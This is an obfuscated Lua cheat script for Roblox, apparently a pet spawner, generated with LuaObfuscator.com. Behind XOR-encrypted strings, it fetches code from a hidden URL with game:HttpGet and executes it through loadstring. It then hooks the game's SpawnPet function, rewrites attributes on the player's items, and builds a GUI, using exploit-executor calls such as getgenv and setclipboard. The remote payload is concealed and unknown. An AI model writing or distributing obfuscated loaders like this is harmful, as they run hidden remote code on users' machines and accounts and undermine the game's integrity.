--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local TABLE_TableIndirection = {};
TABLE_TableIndirection["obf_stringchar%0"] = string.char;
TABLE_TableIndirection["obf_stringbyte%0"] = string.byte;
TABLE_TableIndirection["obf_stringsub%0"] = string.sub;
TABLE_TableIndirection["obf_bitlib%0"] = bit32 or bit;
TABLE_TableIndirection["obf_XOR%0"] = TABLE_TableIndirection["obf_bitlib%0"].bxor;
TABLE_TableIndirection["obf_tableconcat%0"] = table.concat;
TABLE_TableIndirection["obf_tableinsert%0"] = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	TABLE_TableIndirection["result%0"] = {};
	_G.Cs = {UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};
	for i = 1, #LUAOBFUSACTOR_STR do
		TABLE_TableIndirection["obf_tableinsert%0"](TABLE_TableIndirection["result%0"], TABLE_TableIndirection["obf_stringchar%0"](TABLE_TableIndirection["obf_XOR%0"](TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_STR, i, i + #Cs + 1)), TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return TABLE_TableIndirection["obf_tableconcat%0"](TABLE_TableIndirection["result%0"]);
end
bit32 = {};
TABLE_TableIndirection["N%0"] = 32;
TABLE_TableIndirection["P%0"] = 2 ^ TABLE_TableIndirection["N%0"];
bit32.bnot = function(x)
	x = x % TABLE_TableIndirection["P%0"];
	return (TABLE_TableIndirection["P%0"] - 1) - x;
end;
bit32.band = function(x, y)
	TABLE_TableIndirection["FlatIdent_2584C%0"] = 0;
	TABLE_TableIndirection["r%0"] = nil;
	TABLE_TableIndirection["p%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_2584C%0"] == 1) then
			if (y == 4294967295) then
				return x % 4294967296;
			end
			x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
			TABLE_TableIndirection["FlatIdent_2584C%0"] = 2;
		end
		if (TABLE_TableIndirection["FlatIdent_2584C%0"] == 0) then
			if (y == 255) then
				return x % 256;
			end
			if ((y == 65535) or (4593 <= 2672)) then
				return x % 65536;
			end
			TABLE_TableIndirection["FlatIdent_2584C%0"] = 1;
		end
		if (TABLE_TableIndirection["FlatIdent_2584C%0"] == 3) then
			for i = 1, TABLE_TableIndirection["N%0"] do
				TABLE_TableIndirection["FlatIdent_89ECE%0"] = 0;
				TABLE_TableIndirection["a%0"] = nil;
				TABLE_TableIndirection["b%0"] = nil;
				while true do
					if (TABLE_TableIndirection["FlatIdent_89ECE%0"] == 1) then
						if ((TABLE_TableIndirection["a%0"] + TABLE_TableIndirection["b%0"]) == 2) then
							TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
						end
						TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
						break;
					end
					if (TABLE_TableIndirection["FlatIdent_89ECE%0"] == 0) then
						TABLE_TableIndirection["a%0"], TABLE_TableIndirection["b%0"] = x % 2, y % 2;
						x, y = math.floor(x / 2), math.floor(y / 2);
						TABLE_TableIndirection["FlatIdent_89ECE%0"] = 1;
					end
				end
			end
			return TABLE_TableIndirection["r%0"];
		end
		if (TABLE_TableIndirection["FlatIdent_2584C%0"] == 2) then
			TABLE_TableIndirection["r%0"] = 0;
			TABLE_TableIndirection["p%0"] = 1;
			TABLE_TableIndirection["FlatIdent_2584C%0"] = 3;
		end
	end
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if ((y == 65535) or (1168 > 3156)) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
	TABLE_TableIndirection["r%0"] = 0;
	TABLE_TableIndirection["p%0"] = 1;
	for i = 1, TABLE_TableIndirection["N%0"] do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if (((a + b) >= 1) or (572 > 4486)) then
			TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
		end
		TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
	end
	return TABLE_TableIndirection["r%0"];
end;
bit32.bxor = function(x, y)
	TABLE_TableIndirection["FlatIdent_1743D%0"] = 0;
	TABLE_TableIndirection["r%0"] = nil;
	TABLE_TableIndirection["p%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_1743D%0"] == 1) then
			TABLE_TableIndirection["p%0"] = 1;
			for i = 1, TABLE_TableIndirection["N%0"] do
				TABLE_TableIndirection["FlatIdent_39B0%0"] = 0;
				TABLE_TableIndirection["a%0"] = nil;
				TABLE_TableIndirection["b%0"] = nil;
				while true do
					if (TABLE_TableIndirection["FlatIdent_39B0%0"] == 0) then
						TABLE_TableIndirection["a%0"], TABLE_TableIndirection["b%0"] = x % 2, y % 2;
						x, y = math.floor(x / 2), math.floor(y / 2);
						TABLE_TableIndirection["FlatIdent_39B0%0"] = 1;
					end
					if (TABLE_TableIndirection["FlatIdent_39B0%0"] == 1) then
						if ((TABLE_TableIndirection["a%0"] + TABLE_TableIndirection["b%0"]) == 1) then
							TABLE_TableIndirection["r%0"] = TABLE_TableIndirection["r%0"] + TABLE_TableIndirection["p%0"];
						end
						TABLE_TableIndirection["p%0"] = 2 * TABLE_TableIndirection["p%0"];
						break;
					end
				end
			end
			TABLE_TableIndirection["FlatIdent_1743D%0"] = 2;
		end
		if (2 == TABLE_TableIndirection["FlatIdent_1743D%0"]) then
			return TABLE_TableIndirection["r%0"];
		end
		if (TABLE_TableIndirection["FlatIdent_1743D%0"] == 0) then
			x, y = x % TABLE_TableIndirection["P%0"], y % TABLE_TableIndirection["P%0"];
			TABLE_TableIndirection["r%0"] = 0;
			TABLE_TableIndirection["FlatIdent_1743D%0"] = 1;
		end
	end
end;
bit32.lshift = function(x, s_amount)
	TABLE_TableIndirection["FlatIdent_61585%0"] = 0;
	while true do
		if (1 == TABLE_TableIndirection["FlatIdent_61585%0"]) then
			if (s_amount < 0) then
				return math.floor(x * (2 ^ s_amount));
			else
				return (x * (2 ^ s_amount)) % TABLE_TableIndirection["P%0"];
			end
			break;
		end
		if (0 == TABLE_TableIndirection["FlatIdent_61585%0"]) then
			if ((1404 == 1404) and (math.abs(s_amount) >= TABLE_TableIndirection["N%0"])) then
				return 0;
			end
			x = x % TABLE_TableIndirection["P%0"];
			TABLE_TableIndirection["FlatIdent_61585%0"] = 1;
		end
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= TABLE_TableIndirection["N%0"]) then
		return 0;
	end
	x = x % TABLE_TableIndirection["P%0"];
	if ((s_amount > 0) or (3748 < 2212)) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % TABLE_TableIndirection["P%0"];
	end
end;
bit32.arshift = function(x, s_amount)
	TABLE_TableIndirection["FlatIdent_1BCFB%0"] = 0;
	while true do
		if (TABLE_TableIndirection["FlatIdent_1BCFB%0"] == 1) then
			if ((4090 < 4653) and (s_amount > 0)) then
				TABLE_TableIndirection["FlatIdent_27957%0"] = 0;
				TABLE_TableIndirection["add%0"] = nil;
				while true do
					if (TABLE_TableIndirection["FlatIdent_27957%0"] == 1) then
						return math.floor(x * (2 ^ -s_amount)) + TABLE_TableIndirection["add%0"];
					end
					if (0 == TABLE_TableIndirection["FlatIdent_27957%0"]) then
						TABLE_TableIndirection["add%0"] = 0;
						if ((x >= (TABLE_TableIndirection["P%0"] / 2)) or (2652 < 196)) then
							TABLE_TableIndirection["add%0"] = TABLE_TableIndirection["P%0"] - (2 ^ (TABLE_TableIndirection["N%0"] - s_amount));
						end
						TABLE_TableIndirection["FlatIdent_27957%0"] = 1;
					end
				end
			else
				return (x * (2 ^ -s_amount)) % TABLE_TableIndirection["P%0"];
			end
			break;
		end
		if (TABLE_TableIndirection["FlatIdent_1BCFB%0"] == 0) then
			if ((math.abs(s_amount) >= TABLE_TableIndirection["N%0"]) or (1180 == 2180)) then
				return 0;
			end
			x = x % TABLE_TableIndirection["P%0"];
			TABLE_TableIndirection["FlatIdent_1BCFB%0"] = 1;
		end
	end
end;
TABLE_TableIndirection["v0%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\225\207\218\60\227\169\212", "\126\177\163\187\69\134\219\167"));
TABLE_TableIndirection["v1%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\17\200\58\201\245\32\204\62\192\248\16\217\37\215\253\36\200", "\156\67\173\74\165"));
TABLE_TableIndirection["v2%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\1\164\76\4\149\40\86\33\163\122\19\174\48\79\55\178", "\38\84\215\41\118\220\70"));
TABLE_TableIndirection["v3%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\100\1\39\23\240\99\19\48\4\247\83\19", "\158\48\118\66\114"));
TABLE_TableIndirection["v4%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\135\45\23\62\103\172\245\172", "\155\203\68\112\86\19\197"));
TABLE_TableIndirection["v5%0"] = TABLE_TableIndirection["v0%0"].LocalPlayer;
TABLE_TableIndirection["v6%0"] = setclipboard or (syn and syn.clipboard.set) or (clip and clip.set);
TABLE_TableIndirection["v7%0"] = 0.4 + 0;
TABLE_TableIndirection["v8%0"] = {LUAOBFUSACTOR_DECRYPT_STR_0("\95\210\35\188\65\106\224\184\72\210\34\188\72\119\233\252\79\211\49\188\65\56\241\247\73\209\119", "\152\38\189\86\156\32\24\133"),LUAOBFUSACTOR_DECRYPT_STR_0("\229\88\178\6\253\69\162\6\242\88\179\6\244\88\171\66\245\89\160\6\253\23\179\73\243\94\230", "\38\156\55\199")};
TABLE_TableIndirection["v9%0"] = setmetatable({}, {[LUAOBFUSACTOR_DECRYPT_STR_0("\151\66\113\39\23\113", "\35\200\29\28\72\115\20\154")]="k"});
local v10, v11 = pcall(function()
	TABLE_TableIndirection["v26%0"] = game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\17\171\197\207\158\118\123\86\184\216\203\129\45\54\87\188\222\210\194\40\53\11\180\213\222\159\39\123\29\190\195\212\194\97\123\11\190\198\144\128\45\61\23\240\226\207\140\59\58\28\173\159\211\152\45", "\84\121\223\177\191\237\76"), true);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\137\87\222\224\9\64\49\214\181\83\219\238\54\69\49\129\183\83\199\167\46\88\106", "\161\219\54\169\192\90\48\80"), #TABLE_TableIndirection["v26%0"]);
	if ((4135 < 4817) and (not TABLE_TableIndirection["v26%0"] or (TABLE_TableIndirection["v26%0"] == ""))) then
		warn(LUAOBFUSACTOR_DECRYPT_STR_0("\108\79\16\49\80\2\15\55\9\75\14\51\72\78\9\33\9\80\5\54\89\77\14\54\76\2\6\55\70\79\64\22\89\67\23\43\76\80\78\41\92\67\76\101\92\81\9\43\78\2\6\36\69\78\2\36\74\73", "\69\41\34\96"));
		return {[LUAOBFUSACTOR_DECRYPT_STR_0("\144\204\214\14", "\75\220\163\183\106\98")]=function()
		end,[LUAOBFUSACTOR_DECRYPT_STR_0("\49\170\138\32\215\50\191\159", "\185\98\218\235\87")]=function()
			TABLE_TableIndirection["FlatIdent_8F59B%0"] = 0;
			TABLE_TableIndirection["v218%0"] = nil;
			while true do
				if (TABLE_TableIndirection["FlatIdent_8F59B%0"] == 0) then
					TABLE_TableIndirection["v218%0"] = 0;
					while true do
						if (TABLE_TableIndirection["v218%0"] == (0 - 0)) then
							TABLE_TableIndirection["FlatIdent_2AC68%0"] = 0;
							while true do
								if (TABLE_TableIndirection["FlatIdent_2AC68%0"] == 0) then
									warn(LUAOBFUSACTOR_DECRYPT_STR_0("\237\61\43\234\220\171\200\55\103\213\206\171\220\50\23\227\202\234\200\61\43\234\219\174", "\202\171\92\71\134\190"));
									return nil;
								end
							end
						end
					end
					break;
				end
			end
		end};
	end
	local v27, v28 = loadstring(TABLE_TableIndirection["v26%0"]);
	if not v27 then
		TABLE_TableIndirection["FlatIdent_1B51D%0"] = 0;
		while true do
			if (TABLE_TableIndirection["FlatIdent_1B51D%0"] == 0) then
				warn(LUAOBFUSACTOR_DECRYPT_STR_0("\37\206\45\140\58\213\62\129\39\198\108\142\40\200\32\141\45\155\108", "\232\73\161\76") .. tostring(v28) .. LUAOBFUSACTOR_DECRYPT_STR_0("\247\153\87\78\23\181\222\2\91\31\183\213\64\92\29\176", "\126\219\185\34\61"));
				return {[LUAOBFUSACTOR_DECRYPT_STR_0("\32\193\95\118", "\135\108\174\62\18\30\23\147")]=function()
				end,[LUAOBFUSACTOR_DECRYPT_STR_0("\133\249\43\220\22\158\54\211", "\167\214\137\74\171\120\206\83")]=function()
					TABLE_TableIndirection["FlatIdent_17196%0"] = 0;
					while true do
						if (TABLE_TableIndirection["FlatIdent_17196%0"] == 0) then
							warn(LUAOBFUSACTOR_DECRYPT_STR_0("\173\241\62\81\250\166\136\251\114\110\232\166\156\254\2\88\236\231\136\241\62\81\253\163", "\199\235\144\82\61\152"));
							return nil;
						end
					end
				end};
			end
		end
	end
	TABLE_TableIndirection["v29%0"] = v27();
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\43\25\184\47\2\18\249\24\23\23\174\37\2\4\249\63\30\6\188\113", "\75\103\118\217"), typeof(TABLE_TableIndirection["v29%0"]));
	if ((272 == 272) and (typeof(TABLE_TableIndirection["v29%0"]) == LUAOBFUSACTOR_DECRYPT_STR_0("\211\85\114\24\188", "\126\167\52\16\116\217"))) then
		return TABLE_TableIndirection["v29%0"];
	elseif (typeof(TABLE_TableIndirection["v29%0"]) == LUAOBFUSACTOR_DECRYPT_STR_0("\206\59\46\131\160\16\243\198", "\156\168\78\64\224\212\121")) then
		return TABLE_TableIndirection["v29%0"]();
	else
		warn(LUAOBFUSACTOR_DECRYPT_STR_0("\50\224\160\214\23\235\166\218\2\234\229\220\2\250\176\220\9\174\177\215\23\235\229\200\21\225\168\142\52\254\164\217\9\235\183\128\11\251\164\148\71", "\174\103\142\197") .. typeof(TABLE_TableIndirection["v29%0"]) .. LUAOBFUSACTOR_DECRYPT_STR_0("\26\104\74\43\44\80\255\22\46\94\52\41\92\249\85\35", "\152\54\72\63\88\69\62"));
		return {[LUAOBFUSACTOR_DECRYPT_STR_0("\248\203\239\88", "\60\180\164\142")]=function()
		end,[LUAOBFUSACTOR_DECRYPT_STR_0("\107\78\4\62\41\221\23\76", "\114\56\62\101\73\71\141")]=function()
			TABLE_TableIndirection["FlatIdent_12544%0"] = 0;
			TABLE_TableIndirection["v232%0"] = nil;
			while true do
				if (TABLE_TableIndirection["FlatIdent_12544%0"] == 0) then
					TABLE_TableIndirection["v232%0"] = 1883 - (1668 + 215);
					while true do
						if ((100 <= 3123) and (TABLE_TableIndirection["v232%0"] == 0)) then
							warn(LUAOBFUSACTOR_DECRYPT_STR_0("\158\232\215\200\186\232\216\207\248\218\203\197\175\231\235\193\172\169\216\197\180\229\222\192", "\164\216\137\187"));
							return nil;
						end
					end
					break;
				end
			end
		end};
	end
end);
if (not v10 or (1369 > 4987)) then
	TABLE_TableIndirection["v197%0"] = 0;
	while true do
		if ((TABLE_TableIndirection["v197%0"] == (0 + 0)) or (863 >= 4584)) then
			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\244\231\56\190\163\250\75\198\233\113\190\169\255\15\146\213\33\179\177\240\14\192\168\61\167\167\164\75", "\107\178\134\81\210\198\158") .. tostring(v11));
			v11 = {[LUAOBFUSACTOR_DECRYPT_STR_0("\20\1\131\194", "\202\88\110\226\166")]=function()
			end,[LUAOBFUSACTOR_DECRYPT_STR_0("\240\31\131\224\196\243\10\150", "\170\163\111\226\151")]=function()
				TABLE_TableIndirection["FlatIdent_29B3D%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_29B3D%0"] == 0) then
						warn(LUAOBFUSACTOR_DECRYPT_STR_0("\55\49\190\52\76\54\42\26\112\129\40\79\32\39\33\53\166\120\77\54\37\29\53\182", "\73\113\80\210\88\46\87"));
						return nil;
					end
				end
			end};
			break;
		end
	end
else
	TABLE_TableIndirection["FlatIdent_3EEE1%0"] = 0;
	while true do
		if (TABLE_TableIndirection["FlatIdent_3EEE1%0"] == 0) then
			getgenv().LocalSpawner = v11;
			pcall(function()
				if ((v11.Load and (type(v11.Load) == LUAOBFUSACTOR_DECRYPT_STR_0("\135\57\195\17\243\136\35\195", "\135\225\76\173\114"))) or (724 >= 1668)) then
					v11.Load();
				end
			end);
			TABLE_TableIndirection["FlatIdent_3EEE1%0"] = 1;
		end
		if (TABLE_TableIndirection["FlatIdent_3EEE1%0"] == 1) then
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\41\253\185\167\162\184\181\90\225\183\177\168\184\163\90\254\173\179\175\184\180\9\235\173\188\160\164", "\199\122\141\216\208\204\221"));
			break;
		end
	end
end
local function v12(v30, v31, v32)
	if ((428 < 1804) and v30 and v30.SetAttribute) then
		pcall(function()
			v30:SetAttribute(v31, v32);
		end);
	end
end
local function v13(v33)
	TABLE_TableIndirection["FlatIdent_324DE%0"] = 0;
	while true do
		if (TABLE_TableIndirection["FlatIdent_324DE%0"] == 1) then
			v12(v33, LUAOBFUSACTOR_DECRYPT_STR_0("\157\248\36\207\77\195\132\249", "\150\205\189\112\144\24"), "");
			break;
		end
		if (0 == TABLE_TableIndirection["FlatIdent_324DE%0"]) then
			if (not v33 or not v33.Parent) then
				return;
			end
			v12(v33, "b", "l");
			TABLE_TableIndirection["FlatIdent_324DE%0"] = 1;
		end
	end
end
local function v14(v34)
	TABLE_TableIndirection["FlatIdent_7909D%0"] = 0;
	TABLE_TableIndirection["v35%0"] = nil;
	TABLE_TableIndirection["v36%0"] = nil;
	TABLE_TableIndirection["v37%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_7909D%0"] == 1) then
			TABLE_TableIndirection["v37%0"] = nil;
			while true do
				if (TABLE_TableIndirection["v35%0"] == (0 + 0)) then
					if (not v34 or (3325 > 4613)) then
						return false;
					end
					TABLE_TableIndirection["v36%0"], TABLE_TableIndirection["v37%0"] = pcall(function()
						return v34:GetAttribute(LUAOBFUSACTOR_DECRYPT_STR_0("\12\144\186\65\48\145\1\21", "\112\69\228\223\44\100\232\113"));
					end);
					TABLE_TableIndirection["v35%0"] = 519 - (114 + 404);
				end
				if (TABLE_TableIndirection["v35%0"] == (489 - (106 + 382))) then
					return (TABLE_TableIndirection["v36%0"] and (TABLE_TableIndirection["v37%0"] == LUAOBFUSACTOR_DECRYPT_STR_0("\228\26\19", "\230\180\127\103\179\214\28"))) or v34:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\184\10\80\74", "\128\236\101\63\38\132\33"));
				end
			end
			break;
		end
		if (TABLE_TableIndirection["FlatIdent_7909D%0"] == 0) then
			TABLE_TableIndirection["v35%0"] = 0 - 0;
			TABLE_TableIndirection["v36%0"] = nil;
			TABLE_TableIndirection["FlatIdent_7909D%0"] = 1;
		end
	end
end
local function v15(v38)
	TABLE_TableIndirection["FlatIdent_4CC24%0"] = 0;
	TABLE_TableIndirection["v39%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_4CC24%0"] == 0) then
			TABLE_TableIndirection["v39%0"] = 411 - (306 + 105);
			while true do
				if ((TABLE_TableIndirection["v39%0"] == (0 - 0)) or (4950 <= 4553)) then
					TABLE_TableIndirection["FlatIdent_207CC%0"] = 0;
					while true do
						if (TABLE_TableIndirection["FlatIdent_207CC%0"] == 1) then
							TABLE_TableIndirection["v39%0"] = 428 - (166 + 261);
							break;
						end
						if (TABLE_TableIndirection["FlatIdent_207CC%0"] == 0) then
							if ((2665 <= 3933) and TABLE_TableIndirection["v9%0"][v38]) then
								return;
							end
							TABLE_TableIndirection["v9%0"][v38] = true;
							TABLE_TableIndirection["FlatIdent_207CC%0"] = 1;
						end
					end
				end
				if ((3273 == 3273) and (TABLE_TableIndirection["v39%0"] == 1)) then
					if v14(v38) then
						v13(v38);
					end
					if (v38 and (typeof(v38) == LUAOBFUSACTOR_DECRYPT_STR_0("\133\167\2\80\183\229\204\169", "\175\204\201\113\36\214\139")) and v38.GetAttributeChangedSignal) then
						pcall(function()
							v38:GetAttributeChangedSignal(LUAOBFUSACTOR_DECRYPT_STR_0("\110\216\48\209\48\94\220\48", "\100\39\172\85\188")):Connect(function()
								if v14(v38) then
									v13(v38);
								end
							end);
						end);
					end
					break;
				end
			end
			break;
		end
	end
end
local function v16(v40)
	TABLE_TableIndirection["v41%0"] = 0;
	while true do
		if ((3824 > 409) and (0 == TABLE_TableIndirection["v41%0"])) then
			if ((2087 == 2087) and not v40) then
				return;
			end
			for v225, v226 in v40:GetDescendants() do
				v15(v226);
			end
			TABLE_TableIndirection["v41%0"] = 508 - (289 + 218);
		end
		if ((TABLE_TableIndirection["v41%0"] == 1) or (3404 > 4503)) then
			v40.DescendantAdded:Connect(v15);
			break;
		end
	end
end
v16(workspace);
v16(TABLE_TableIndirection["v5%0"].Backpack);
if (TABLE_TableIndirection["v5%0"].Character or (3506 <= 1309)) then
	v16(TABLE_TableIndirection["v5%0"].Character);
end
TABLE_TableIndirection["v5%0"].CharacterAdded:Connect(v16);
if (v11 and (type(v11) == LUAOBFUSACTOR_DECRYPT_STR_0("\185\121\187\140\54", "\83\205\24\217\224")) and (type(v11.SpawnPet) == LUAOBFUSACTOR_DECRYPT_STR_0("\224\208\195\62\242\204\194\51", "\93\134\165\173"))) then
	TABLE_TableIndirection["v199%0"] = 1344 - (1213 + 131);
	TABLE_TableIndirection["v200%0"] = nil;
	while true do
		if ((2955 == 2955) and (TABLE_TableIndirection["v199%0"] == (0 + 0))) then
			TABLE_TableIndirection["v200%0"] = v11.SpawnPet;
			v11.SpawnPet = function(v233, v234, v235, ...)
				TABLE_TableIndirection["v236%0"] = TABLE_TableIndirection["v200%0"](v233, v234, v235, ...);
				if (TABLE_TableIndirection["v236%0"] or (2903 == 1495)) then
					pcall(function()
						TABLE_TableIndirection["FlatIdent_8A742%0"] = 0;
						while true do
							if (0 == TABLE_TableIndirection["FlatIdent_8A742%0"]) then
								v13(TABLE_TableIndirection["v236%0"]);
								v15(TABLE_TableIndirection["v236%0"]);
								TABLE_TableIndirection["FlatIdent_8A742%0"] = 1;
							end
							if (TABLE_TableIndirection["FlatIdent_8A742%0"] == 1) then
								for v250, v251 in TABLE_TableIndirection["v236%0"]:GetChildren() do
									TABLE_TableIndirection["v252%0"] = 0 + 0;
									while true do
										if ((4546 >= 2275) and ((0 - 0) == TABLE_TableIndirection["v252%0"])) then
											v15(v251);
											if ((819 >= 22) and v14(v251)) then
												v13(v251);
											end
											break;
										end
									end
								end
								break;
							end
						end
					end);
				end
				return TABLE_TableIndirection["v236%0"];
			end;
			break;
		end
	end
end
TABLE_TableIndirection["v17%0"] = TABLE_TableIndirection["v1%0"]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\153\243\204\199\31\216\183\112\170\225", "\30\222\146\161\162\90\174\210"));
TABLE_TableIndirection["v18%0"] = TABLE_TableIndirection["v17%0"] and TABLE_TableIndirection["v17%0"]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\203\65\100\3\227\71\115\11\241\71\127\4", "\106\133\46\16"));
local function v19(v42, v43)
	TABLE_TableIndirection["FlatIdent_2F37F%0"] = 0;
	TABLE_TableIndirection["v44%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_2F37F%0"] == 0) then
			TABLE_TableIndirection["v44%0"] = 0;
			while true do
				TABLE_TableIndirection["FlatIdent_5998C%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_5998C%0"] == 0) then
						if ((3162 == 3162) and (TABLE_TableIndirection["v44%0"] == (0 - 0))) then
							TABLE_TableIndirection["FlatIdent_2388%0"] = 0;
							while true do
								if (1 == TABLE_TableIndirection["FlatIdent_2388%0"]) then
									TABLE_TableIndirection["v44%0"] = 2 - 1;
									break;
								end
								if (TABLE_TableIndirection["FlatIdent_2388%0"] == 0) then
									v42 = string.lower(v42 or "");
									for v228, v229 in v43 do
										if v42:find(v229, 860 - (814 + 45), true) then
											return true;
										end
									end
									TABLE_TableIndirection["FlatIdent_2388%0"] = 1;
								end
							end
						end
						if (TABLE_TableIndirection["v44%0"] == (1 + 0)) then
							return false;
						end
						break;
					end
				end
			end
			break;
		end
	end
end
local function v20()
	if not TABLE_TableIndirection["v5%0"].PlayerGui then
		TABLE_TableIndirection["v216%0"] = 0 + 0;
		while true do
			if ((TABLE_TableIndirection["v216%0"] == 0) or (2369 > 4429)) then
				TABLE_TableIndirection["FlatIdent_75224%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_75224%0"] == 0) then
						print(LUAOBFUSACTOR_DECRYPT_STR_0("\104\44\114\229\95\82\127\53\122\188\84\79\76\96\117\243\79\78\92", "\32\56\64\19\156\58"));
						return nil, nil, nil, nil, nil, nil, nil;
					end
				end
			end
		end
	end
	TABLE_TableIndirection["v45%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\105\203\247\83\95\252\167\79\193", "\224\58\168\133\54\58\146"));
	TABLE_TableIndirection["v45%0"].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\126\95\77\233\94\131\158\62\112", "\107\57\54\43\157\21\230\231");
	TABLE_TableIndirection["v45%0"].ResetOnSpawn = false;
	TABLE_TableIndirection["v45%0"].Parent = TABLE_TableIndirection["v5%0"].PlayerGui;
	TABLE_TableIndirection["v50%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\249\135\4\231\156\218\201\222\136\5", "\175\187\235\113\149\217\188"));
	TABLE_TableIndirection["v50%0"].Size = 893 - (261 + 624);
	TABLE_TableIndirection["v50%0"].Parent = TABLE_TableIndirection["v4%0"];
	TABLE_TableIndirection["v53%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\26\189\128\65\230", "\24\92\207\225\44\131\25"));
	TABLE_TableIndirection["v53%0"].Size = UDim2.new(0 - 0, 1480 - (1020 + 60), 1423 - (630 + 793), 350);
	TABLE_TableIndirection["v53%0"].Position = UDim2.new(0.5 - 0, -200, 0.5 - 0, -(69 + 106));
	TABLE_TableIndirection["v53%0"].BackgroundColor3 = Color3.fromRGB(30, 103 - 73, 1777 - (760 + 987));
	TABLE_TableIndirection["v53%0"].BorderSizePixel = 0;
	TABLE_TableIndirection["v53%0"].Parent = TABLE_TableIndirection["v45%0"];
	TABLE_TableIndirection["v59%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\126\250\159\94\26\121\66\214\182\88", "\29\43\179\216\44\123"));
	TABLE_TableIndirection["v59%0"].Color = ColorSequence.new({ColorSequenceKeypoint.new(766 - (745 + 21), Color3.fromRGB(0 + 0, 330 - 210, 1000 - 745)),ColorSequenceKeypoint.new(0.5 + 0, Color3.fromRGB(1155 - (87 + 968), 220 - 170, 182 + 18)),ColorSequenceKeypoint.new(1, Color3.fromRGB(200, 70, 1563 - (447 + 966)))});
	TABLE_TableIndirection["v59%0"].Rotation = 123 - 78;
	TABLE_TableIndirection["v59%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v63%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\136\240\3\67\175\215\37\94", "\44\221\185\64"));
	TABLE_TableIndirection["v63%0"].CornerRadius = UDim.new(0, 10);
	TABLE_TableIndirection["v63%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v66%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\52\206\123\75\97\14\236\77", "\19\97\135\40\63"));
	TABLE_TableIndirection["v66%0"].Thickness = 1819 - (1703 + 114);
	TABLE_TableIndirection["v66%0"].Color = Color3.fromRGB(701 - (376 + 325), 0 - 0, 0 - 0);
	TABLE_TableIndirection["v66%0"].Transparency = 0.5 + 0;
	TABLE_TableIndirection["v66%0"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border;
	TABLE_TableIndirection["v66%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v73%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\136\78\50\54\42", "\81\206\60\83\91\79"));
	TABLE_TableIndirection["v73%0"].Size = UDim2.new(2 - 1, 14 - (9 + 5), 376 - (85 + 291), 1315 - (243 + 1022));
	TABLE_TableIndirection["v73%0"].BackgroundColor3 = Color3.fromRGB(20, 20, 76 - 56);
	TABLE_TableIndirection["v73%0"].BorderSizePixel = 0;
	TABLE_TableIndirection["v73%0"].Parent = TABLE_TableIndirection["v53%0"];
